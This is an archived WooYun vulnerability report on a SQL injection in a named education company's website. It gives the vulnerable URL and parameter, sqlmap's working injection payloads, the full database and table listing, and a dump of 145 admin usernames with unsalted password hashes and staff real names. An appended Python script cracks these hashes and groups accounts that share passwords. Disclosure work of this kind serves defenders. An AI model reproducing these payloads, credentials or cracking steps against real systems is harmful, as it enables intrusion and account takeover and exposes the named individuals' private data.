WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-06-29: Details reported to the vendor, awaiting vendor action
2015-06-30: Vendor confirmed; details visible to the vendor only
2015-07-10: Details opened to core whitehats and domain experts
2015-07-20: Details opened to regular whitehats
2015-07-30: Details opened to intern whitehats
2015-08-14: Details made public
As the title says (supplementary data as proof).
Time-based blind SQL injection; sqlmap also confirms boolean-based, error-based, stacked-query and UNION injection on the same parameter. The injection reaches multiple databases, and many admin accounts use weak passwords.
49ba59abbe56e057 is the 16-character MD5 of 123456; it is the most frequent password hash in the Cl_Admin dump below.
SQL injection point
http://1dui1.huatu.com/ydyzs.php, POST body tag=1&title=54O5b8On; the title parameter is vulnerable to time-based blind SQL injection.
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tag=1&title=';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: tag=1&title=' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2000
current user: 'develop'
current database: 'HTOLMain'
current user is DBA: False
available databases [11]:
[*] HTOL_Card
[*] HTOL_DaSai
[*] HTOL_Study
[*] HTOLMain
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb

Database: HTOLMain
[248 tables]
360cps
360cps_copy
AliPay_Cash_Log
Branch_School
Card_Msyy
ChunJie_YouhuiInfo
Cl_Admin
Cl_Ads
Cl_Announce
Cl_Article
Cl_BankrollItem
Cl_CardFree
Cl_CardFreeNum
Cl_Channel
Cl_Class
Cl_Comment
Cl_ConsumeLog
Cl_Course_Price
Cl_CreateFiles
Cl_DeliverItem
Cl_DeliverType
Cl_Favorite
Cl_Friend
Cl_Guest
Cl_Js
Cl_Keyword
Cl_Label
Cl_LinkClass
Cl_LinkConfig
Cl_LinkSite
Cl_MKCard
Cl_Message
Cl_Movie
Cl_NoDownLoad
Cl_Order
Cl_OrderItem
Cl_OrderItem_History
Cl_Order_History
Cl_Page
Cl_PageItem
Cl_PassIP
Cl_Payment
Cl_Photo
Cl_Plus
Cl_Product
Cl_Server
Cl_Setup
Cl_Soft
Cl_Special
Cl_Student_Schedule
Cl_Style
Cl_StyleHelp
Cl_UpFileLog
Cl_User
Cl_UserCz
Cl_UserCz_Used
Cl_UserGroup
Cl_User_Ext
Cl_User_Unactive
Cl_Vote
Cl_acclog
Cl_tylog
ClassHandOut
Complaint
CunGuanClasses
DV_IP
EventLog
FreeCard_ConsumeLog
HTTC_Cl_Order
HTTC_Cl_OrderItem
JCZFClasses
JiFen_Log
JunClasses
LearnAnswers
LearnClassNotes
LearnQuestions
LearnStatInfo
LearningClasses
LearningLog
MianShiClasses
MianShi_AppointmentInfo
MianShi_StudentInfo
MonthOrderCourse
NetClassCategory
NetClassFeedBack
NetClassLogic
NetClassSubjects
NetClassSuit
NetClassTypes
NetClass_Assignment_Relation
NetClass_Assignments
NetClass_Download_Relation
NetClass_Downloads
NetClass_HomeWork
NetClass_Learn_Log
NetClass_Notice
NetClass_Notice_Relation
NetClasses
NetClasses_Treaty
NetClasses_ZengSong
NetLession_Learn_Log
NetLession_Rate_Log
NetLessions
NormalClasses
Order_ext
Privilage_Info
PromoCode
Province
Role_Info
Role_Privilage
RoomCourse
SNS_Blog
SNS_Blog_Category
SNS_Blog_Comment
SNS_Friends
SNS_Friends_Invite
SNS_Friends_Type
SNS_Friends_Visit_Log
SNS_Message_LastView
SNS_NewsFeed
SNS_User_CareerInfo
SNS_User_Contact
SNS_User_Education
SNS_User_LiuYan
SNS_User_LiuYan_Reply
SNS_User_Private_Settings
SNS_User_StatusText
SNS_Vote
SNS_Vote_Result
SNS_Vote_Revote
SNS_Vote_Sub
ScheduleDetail
SheGongClasses
ShiYeClasses
Shumaban_Card
Shumaban_LearnQuestions
TeacherSubjects
Teacher_Rate_Log
Teachers
TiYanCard_Info
TiYanClasses
TrialClasses
Unactive_User_Classes
UnionApply
UnionInfo
Union_AgentFee
Union_News
User_ConsumeLog
User_QH_log
XDTrialClasses
XH_Config
XH_IP
XH_Question
XH_Subject
XH_Title
XH_UserInfo
XiangZhenClasses
XuanDiaoClasses
ZhaoJingClasses
activelink
bishi_StudentInfo
city
cl_list
cl_newpermissions
classBanbie
classPhase
classTable
classTixi
classTpl
classVer
classView
comment
digitalArea
digitalClass
digital_replyRate
drm_ip
dtproperties
emailLog
freecard_order_relation
generateCourseRecord
helpCenter
helpType
hteacher_userunion
indexHot
indexNew
indexRebao
jiangyiimg
jsName
jsSize
knowledge_point
learn_activity_list
lession_rate
lession_studyresult
lesson_vote
libyc_usertbinfo
libyc_usertbspaceused
merchant
mkClass
monthCardUser
monthOrder
monthOrderRemark
netclassext
netclassexttype
noteType
oldUserDiscount
orderextent
poll
promary
puzi_Recommend
puzi_subject
qpx_userInfo
recommendUnion
registerInfo
replyRate
shumaban_LearnAnswers
studentNote
studentNoteReply
sysconstraints
syssegments
teaUser_ConsumeLog
teachers_vote
teauserunionad
tem10sgkNote
temBless
temGkNote
temGqNote
temWy
temZb
tmp_userArea
tmptyk
unionAd
unionAdVisit
unionFocusImg
unionNote
unionNoteReply
unionRegInfo
unionRequest
unionType
userunion
userunion_fankuan
userunionad
xieyiedit
yeepay_cash_log
yiqifa
htol.choujiangKU
htol.choujiangMD
htol.choujiangMD2
htol.userunionsalary

Database: HTOLMain
Table: Cl_Admin
[16 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| AddUser        | nvarchar |
| arrClassCheck  | ntext    |
| arrClassInput  | ntext    |
| arrClassMaster | ntext    |
| department     | nvarchar |
| flag           | tinyint  |
| ID             | int      |
| LastLoginIP    | nvarchar |
| LastLoginTime  | datetime |
| LastLogoutTime | datetime |
| LoginTimes     | int      |
| Password       | nvarchar |
| Purview        | ntext    |
| Purview_Other  | ntext    |
| realname       | nvarchar |
| UserName       | nvarchar |
+----------------+----------+

Database: HTOLMain
Table: Cl_Admin
[145 entries]
UserName | Password | realname
cxhtest | 7202ac6ae9a9a751 | 蔡晓辉
htjy408 | 7545ba2e1ac45b39 | 蔡淝田
htwx080 | 961b2b3b5f14c1bb | 孙旭光
htwx0742 | ffc38b3b0bb15c5c | 靳畅
htyangjie | e34f92d36b069a6a | 杨杰
htjyl0127 | 1cef9c26aa67ab58 | 王铁红
htwx0635 | 0c65d5ec81707084 | 王玲
htjyl1093 | 5fe9db73ac365a6c | 魏本见
htwxsx291 | 37e941b4aa8f39ad | 徐小妹
fjwfjw | 8d4dd7ba0c3c72bf | 傅建文
htjy0591 | 5f8326b142088fec | 李凯
htjyl084 | 81b4398d68735568 | 刘真宗
xinglily | 9fa2f7ec34ff3f07 | 省丽丽
zhangdejiang | 8654796b618b18da | 张德江
htwxzb080 | d551ec92912f3989 | 张梦元
htjy0974 | c3ca81eac41938c0 | 韩利亚
htwx1648 | 7c387f21a5801303 | 王红飞
htjy3860 | 7c1040524eb576b6 | 张宏宇
huatu1772 | 334c07e86695b1aa | 李娇
huangjinxia | 9b2c3c191bfbd273 | 黄金霞
htwx4112 | 0c546befd4151682 | 韦柳
htwxl004 | dae943e903dd210f | 刘洪燕
htwxl007 | 22cd38918ec095b1 | 李文龙
htjy4233 | 98bd35d284dae6af | 白秋冰
liuyuting929 | 6c101ea1b54f2de4 | 刘玉婷
huatu4935 | 28654f37c99225bd | 赵仿
htjy1987 | b9f53508d38ed8ca | 郭元双
肺儿vivv | 8747df9ea382e353 | 杨雯
htjy5818 | 5cd861ba6dee8ff1 | 徐利国
qinzhimin秦志敏 | 49ba59abbe56e057 | 秦志敏
htxinghua | b78d7e71ac5514e5 | 邢华
htjy6188 | e528df012027aedf | 张海亮
李品友 | 310368c3ded5e492 | 李品友
dongpeirong | e528df012027aedf | 董培荣
htwx6349 | 3b31dd1b2fef8895 | 何斌
tencent | 63202bfd738a9df2 | 郭勇
louwaixian | 7a3e6346b0439fb2 | 李园
htjy7218 | 23c3a03d20b7b660 | 朱坤月
htcaijinlong | 295447b4c8419e7d | 蔡金龙
gaoshuang1018 | 93214a1202fe4170 | 郜爽
htjy7514 | ccff059415805dcc | 王红丽
htwxzb078 | fe704367e11653ea | 周为
htzhaojing1987 | 49ba59abbe56e057 | 赵晶
dupengliang2008 | 49ba59abbe56e057 | 杜鹏亮
htmalan | 49ba59abbe56e057 | 马兰
htguolei | 6c6da156be4d0a77 | 郭磊
htjy6684 | 6e6f7bae26bd4046 | 李慧
htjyl081 | 217daa75b32ab47d | 曹丁月
htjs2101 | e2cddf8d44ddb24d | 王利科
htjy3785 | ad77bdfecf2c404c | 孙亚非
zhaojiaody | 8c090a14e428d774 | 招教答疑账号
htwxsh-liuyan | 49ba59abbe56e057 | 刘妍
2013dbmsd | 49ba59abbe56e057 | 山东分校
2013dbmbj | 49ba59abbe56e057 | 北京分校
2013dbmgd | e528df012027aedf | 广东分校
2013dbmsz | 49ba59abbe56e057 | 深圳分校
2013dbmqd | 49ba59abbe56e057 | 青岛分校
2013dbmjs | 49ba59abbe56e057 | 江苏分校
2013dbmln | 3f9537b4d4d5d56f | 辽宁分校
2013dbmjx | 49ba59abbe56e057 | 江西分校
2013dbmyn | 49ba59abbe56e057 | 云南分校
2013dbmzj | 49ba59abbe56e057 | 浙江分校
2013dbmah | 49ba59abbe56e057 | 安徽分校
2013dbmwh | 6590cd208b8f4de1 | 芜湖分校
2013dbmhn | 49ba59abbe56e057 | 河南分校
2013dbmhb | 49ba59abbe56e057 | 河北分校
2013dbmhub | 49ba59abbe56e057 | 湖北分校
2013dbmyc | 49ba59abbe56e057 | 宜昌分校
2013dbmhun | 49ba59abbe56e057 | 湖南分校
2013dbmsy | 49ba59abbe56e057 | 邵阳分校
2013dbmnmg | 49ba59abbe56e057 | 内蒙古分校
2013dbmhlbe | 49ba59abbe56e057 | 呼伦贝尔分校
2013dbmsx | 49ba59abbe56e057 | 山西分校
2013dbmcc | bd240168bf189c9d | 吉林长春分校
2013dbmshx | 49ba59abbe56e057 | 陕西分校
2013dbmgx | 49ba59abbe56e057 | 广西分校
2013dbmgz | 49ba59abbe56e057 | 贵州分校
2013dbmxj | 49ba59abbe56e057 | 新疆分校
2013dbmsc | dbd5c91e1ce150d8 | 四川分校
2013dbmtj | 49ba59abbe56e057 | 天津分校
2013dbmfj | 49ba59abbe56e057 | 福建分校
2013dbmxm | 49ba59abbe56e057 | 厦门分校
2013dbmhain | 49ba59abbe56e057 | 海南分校
2013dbmcq | 49ba59abbe56e057 | 重庆分校
2013dbmnx | 49ba59abbe56e057 | 宁夏分校
2013dbmgs | ed093d23e4b4f666 | 甘肃分校
2013dbmqh | 49ba59abbe56e057 | 青海分校
2013dbmxz | 49ba59abbe56e057 | 西藏分校
2013dbmhlj | 49ba59abbe56e057 | 黑龙江分校
2013dbmjl | 49ba59abbe56e057 | 吉林市分校
2014dbmdl | 49ba59abbe56e057 | 大连分校
htwxjianglu | 6d86bb70aebaea5f | 姜璐
htwxhtshenjiting | 49ba59abbe56e057 | 沈及廷
htwxzhangjian | e91ded229ba29284 | 张建
htwxzhouwen | 2b08341d15348645 | 周文
2014dbmly | 49ba59abbe56e057 | 临沂分校
htwxhtliutao | 2536bb275e3fb8d2 | 刘涛
htwxchangxuan | 62f042d1857c66dd | 常轩
htwxyangxiu | 14e1f06d68c5b339 | 杨秀
htjy5679 | 49ba59abbe56e057 | 胡浩
htwxzhaohy | 49ba59abbe56e057 | 赵环宇
htwxlixiaofeng | 62a29f5731354b1c | 李晓凤
htwxwxlibo | 49ba59abbe56e057 | 李博
htwxchengyongle | 49ba59abbe56e057 | 程永乐
htwxhujp | 227c0381976beea4 | 胡锦平
htwxzhoujl | 49ba59abbe56e057 | 周江龙
htwxhubo | 49ba59abbe56e057 | 胡泊
htwxwxlining | 49ba59abbe56e057 | 李宁
htwxleijie | 49ba59abbe56e057 | 雷婕
htwxpeihf | b8e9597221dfad60 | 裴红粉
htwxxiaotf | be578a5caf991d18 | 肖腾飞
htwxwangmeijuan | 49ba59abbe56e057 | 王美娟
htjy_010383 | 4b1326c98617f689 | 郭玉康
htwxxiehuayun | f8ed4f05b7db9151 | 谢化云
htwxcuixz | 227be011b9732c58 | 崔显志
htwxzhaoyong | b2bf2966ef482595 | 赵勇
htwxzhanghq | 49ba59abbe56e057 | 张海琦
htwxzhangfan | cfc146b448ef26af | 张帆
htwxwxlifei | 445bb47b60cf5f54 | 李飞
htwxzhangel | 49ba59abbe56e057 | 张二龙
2015dbmnb | 49ba59abbe56e057 | 山东分校
htwxxiege | 49ba59abbe56e057 | 谢舸
htwxhouxq | 3d58cd1769c6e676 | 侯鑫琴
htwxbiwei | 83449dde8972df86 | 毕炜
htwxxuxf | 49ba59abbe56e057 | 许晓霏
htwxhtyuexin | fbeaed20868fe492 | 岳鑫
htwxwxliulu | 49ba59abbe56e057 | 刘陆
htwxwxlishuai | 341192aeeabe54b3 | 李帅
weibj666 | 5fe9db73ac365a6c | 魏本见
htwxfengyun | a230e17badc194ab | 冯云
htwxxiongying | c384aa278ff8bbcd | 熊瑛
htwxgaoyu | 737559f4aae9a82f | 高宇
htwxtianzy | 49ba59abbe56e057 | 田志英
htwxdengcj | 49ba59abbe56e057 | 邓昌菊
2013dbmbj_gk | 49ba59abbe56e057 | 王宇航
htwxcaidong | 83aa400af464c76d | 蔡冬
htwxlinjq | aad782eb7517c8de | 林佳岐
htjylzy | c26304613465603f | 刘振宇
htwxxiongqy | 136b2c50a043fe12 | 熊其焰
htwxl691 | 8b1da629ee274cd5 | 申甲子
htwxfull | c26304613465603f | 付莉莉
htwx_4043555 | 97a7757b9e175580 | 王凌燕
htzhoushenghan | c26304613465603f | 周圣涵
htwxluoxm | 0f6fb996e6ee84df | 骆晓明
app_5503c448 | c26304613465603f | 张蕾
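The Password column holds unsalted 16-character MD5 values (the middle 16 hex characters of the 32-character digest, a convention common in legacy Chinese PHP/ASP applications), which is why one hash value can be read straight off as 123456 and why the same value recurs across dozens of branch-school accounts. The following is an added example, not code from the report: it verifies that mapping, cracks a handful of rows copied from the dump above against a constructed mini wordlist, and groups accounts that share a hash, since with no salt an identical hash means an identical password whether or not the wordlist contains it. `ROWS` is a subset of the dump; `WORDLIST` is constructed for illustration.

```python
"""Audit an unsalted 16-char MD5 password dump for weak and shared passwords."""
import hashlib
from collections import defaultdict


def md5_16(password: str) -> str:
    """The 16-hex-char 'short MD5' is the middle 16 characters (offsets 8..23)
    of the 32-char MD5 hex digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


# Rows copied from the Cl_Admin dump above as (UserName, Password hash); a subset only.
ROWS = [
    ("cxhtest", "7202ac6ae9a9a751"),
    ("qinzhimin秦志敏", "49ba59abbe56e057"),
    ("htjy6188", "e528df012027aedf"),
    ("dongpeirong", "e528df012027aedf"),
    ("htzhaojing1987", "49ba59abbe56e057"),
    ("htmalan", "49ba59abbe56e057"),
    ("2013dbmgd", "e528df012027aedf"),
    ("htjy5679", "49ba59abbe56e057"),
    ("htjylzy", "c26304613465603f"),
    ("htwxfull", "c26304613465603f"),
    ("app_5503c448", "c26304613465603f"),
]

# Constructed mini wordlist; a real audit uses a large list plus site-specific guesses.
WORDLIST = ["123456", "password", "111111", "123456789", "admin", "huatu"]


def crack(rows, wordlist):
    """Reverse lookup: hash each candidate once, then match. Because the hashes are
    unsalted, one hash computation per candidate covers every account at once."""
    lookup = {md5_16(w): w for w in wordlist}
    return {user: lookup[h] for user, h in rows if h in lookup}


def shared_hashes(rows, min_users=2):
    """Group accounts by identical hash: without a salt, same hash means same password,
    which exposes reuse even for hashes the wordlist cannot crack."""
    groups = defaultdict(list)
    for user, h in rows:
        groups[h].append(user)
    return {h: users for h, users in groups.items() if len(users) >= min_users}


if __name__ == "__main__":
    for user, pw in crack(ROWS, WORDLIST).items():
        print(f"{user}: {pw}")
    for h, users in shared_hashes(ROWS).items():
        print(f"{h} shared by {len(users)} accounts: {', '.join(users)}")
```

Against the full 145-row dump the same two functions give the real picture of the report's "multiple weak passwords" claim: the 123456 hash alone covers well over half of the accounts, and the e528df012027aedf and c26304613465603f groups show further reuse that a wordlist run would not reveal on its own.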
Fix suggestion: parameter filtering; more robustly, use parameterized queries instead of concatenating the title value into the SQL string.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-06-30 10:57
Being processed, thank you.
None yet